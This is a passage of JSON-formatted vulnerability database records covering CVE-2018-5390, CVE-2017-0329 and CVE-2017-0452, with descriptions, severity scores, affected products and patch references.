        "db": "PACKETSTORM",
        "id": "149826"
      },
      {
        "db": "PACKETSTORM",
        "id": "148916"
      },
      {
        "db": "PACKETSTORM",
        "id": "148899"
      },
      {
        "db": "PACKETSTORM",
        "id": "149546"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-175"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5390"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-08-06T00:00:00",
        "db": "CERT/CC",
        "id": "VU#962459"
      },
      {
        "date": "2018-08-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-135421"
      },
      {
        "date": "2018-08-15T04:42:52",
        "db": "PACKETSTORM",
        "id": "148915"
      },
      {
        "date": "2018-08-07T13:11:00",
        "db": "PACKETSTORM",
        "id": "148841"
      },
      {
        "date": "2018-08-15T04:40:44",
        "db": "PACKETSTORM",
        "id": "148907"
      },
      {
        "date": "2018-08-15T04:42:46",
        "db": "PACKETSTORM",
        "id": "148914"
      },
      {
        "date": "2018-09-25T23:02:34",
        "db": "PACKETSTORM",
        "id": "149544"
      },
      {
        "date": "2018-08-21T20:20:00",
        "db": "PACKETSTORM",
        "id": "149024"
      },
      {
        "date": "2018-10-17T15:40:19",
        "db": "PACKETSTORM",
        "id": "149826"
      },
      {
        "date": "2018-08-15T04:42:57",
        "db": "PACKETSTORM",
        "id": "148916"
      },
      {
        "date": "2018-08-15T04:37:37",
        "db": "PACKETSTORM",
        "id": "148899"
      },
      {
        "date": "2018-09-25T23:02:55",
        "db": "PACKETSTORM",
        "id": "149546"
      },
      {
        "date": "2018-08-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201808-175"
      },
      {
        "date": "2018-08-06T20:29:01.570000",
        "db": "NVD",
        "id": "CVE-2018-5390"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-09-14T00:00:00",
        "db": "CERT/CC",
        "id": "VU#962459"
      },
      {
        "date": "2020-09-18T00:00:00",
        "db": "VULHUB",
        "id": "VHN-135421"
      },
      {
        "date": "2020-09-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201808-175"
      },
      {
        "date": "2023-11-07T02:58:42.387000",
        "db": "NVD",
        "id": "CVE-2018-5390"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "148841"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-175"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "TCP implementations vulnerable to Denial of Service",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#962459"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-175"
      }
    ],
    "trust": 0.6
  }
}

var-201704-0631
Vulnerability from variot

An elevation of privilege vulnerability in the NVIDIA boot and power management processor driver could enable a local malicious application to execute arbitrary code within the context of the boot and power management processor. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel 3.18. Android ID:A-34115304. References: N-CVE-2017-0329. This vulnerability Android ID: A-34115304 and NVIDIA N-CVE-2017-0329 It is published asInformation is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. GooglePixelC is a tablet. NVIDIA GPUdriver is one of the NVIDIA graphics processor driver components used in it. GooglePixelC has a privilege escalation vulnerability that allows an attacker to exploit a vulnerability for privilege escalation. Google Pixel C is prone to a privilege-escalation vulnerability. Attackers can exploit this issue to execute arbitrary code with elevated privileges within the context of the process. This issue is being tracked by Android Bug ID A-34115304

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0631",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel c",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05370"
      },
      {
        "db": "BID",
        "id": "97353"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002881"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0329"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-242"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0329"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Gengjia Chen and pjf of IceSword Lab, Qihoo 360 Technology Co. Ltd.",
    "sources": [
      {
        "db": "BID",
        "id": "97353"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0329",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-0329",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2017-05370",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0329",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0329",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-05370",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201704-242",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0329",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05370"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0329"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002881"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0329"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-242"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the NVIDIA boot and power management processor driver could enable a local malicious application to execute arbitrary code within the context of the boot and power management processor. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel 3.18. Android ID:A-34115304. References: N-CVE-2017-0329. This vulnerability Android ID: A-34115304 and NVIDIA N-CVE-2017-0329 It is published asInformation is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. GooglePixelC is a tablet. NVIDIA GPUdriver is one of the NVIDIA graphics processor driver components used in it. GooglePixelC has a privilege escalation vulnerability that allows an attacker to exploit a vulnerability for privilege escalation. Google Pixel C is prone to a privilege-escalation vulnerability. \nAttackers can exploit this issue to execute arbitrary code with elevated  privileges within  the context of the process. \nThis issue is being tracked by Android Bug ID A-34115304",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0329"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002881"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-05370"
      },
      {
        "db": "BID",
        "id": "97353"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0329"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0329",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "97353",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1038201",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002881",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-05370",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-242",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0329",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05370"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0329"
      },
      {
        "db": "BID",
        "id": "97353"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002881"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0329"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-242"
      }
    ]
  },
  "id": "VAR-201704-0631",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05370"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05370"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:04:55.779000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-April 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-04-01"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GooglePixelC privilege escalation vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/92708"
      },
      {
        "title": "Android NVIDIA boot and power management processor Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=74426"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014April 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=025639006d2b3a5a3351c0120c1dcfe8"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05370"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0329"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002881"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-242"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002881"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0329"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/97353"
      },
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-04-01.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1038201"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-0329"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0329"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2017-04-01"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05370"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0329"
      },
      {
        "db": "BID",
        "id": "97353"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002881"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0329"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-242"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05370"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0329"
      },
      {
        "db": "BID",
        "id": "97353"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002881"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0329"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-242"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-04-26T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-05370"
      },
      {
        "date": "2017-04-05T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0329"
      },
      {
        "date": "2017-04-03T00:00:00",
        "db": "BID",
        "id": "97353"
      },
      {
        "date": "2017-05-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-002881"
      },
      {
        "date": "2017-04-05T14:59:00.260000",
        "db": "NVD",
        "id": "CVE-2017-0329"
      },
      {
        "date": "2017-04-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201704-242"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-04-26T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-05370"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0329"
      },
      {
        "date": "2017-04-04T15:04:00",
        "db": "BID",
        "id": "97353"
      },
      {
        "date": "2017-05-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-002881"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-0329"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201704-242"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-242"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NVIDIA Vulnerabilities related to authorization, authority, and access control in boot and power management processor drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002881"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-242"
      }
    ],
    "trust": 0.6
  }
}

var-201703-0685
Vulnerability from variot

An information disclosure vulnerability in the Qualcomm camera driver could enable a local malicious application to access data outside of its permission levels. This issue is rated as Low because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10. Android ID: A-32873615. References: QC-CR#1093693. GoogleNexus is a high-end mobile phone series powered by Google\342\200\231s original Android system. An attacker could exploit this vulnerability to obtain potentially sensitive information. Google Nexus is prone to an information-disclosure vulnerability. Information obtained may aid in further attacks

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201703-0685",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "android one",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.9,
        "vendor": "google",
        "version": null
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-03639"
      },
      {
        "db": "BID",
        "id": "96836"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002057"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0452"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-285"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0452"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Seven Shen (@lingtongshen) of Trend Micro.",
    "sources": [
      {
        "db": "BID",
        "id": "96836"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0452",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 4.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.6,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-0452",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2017-03639",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
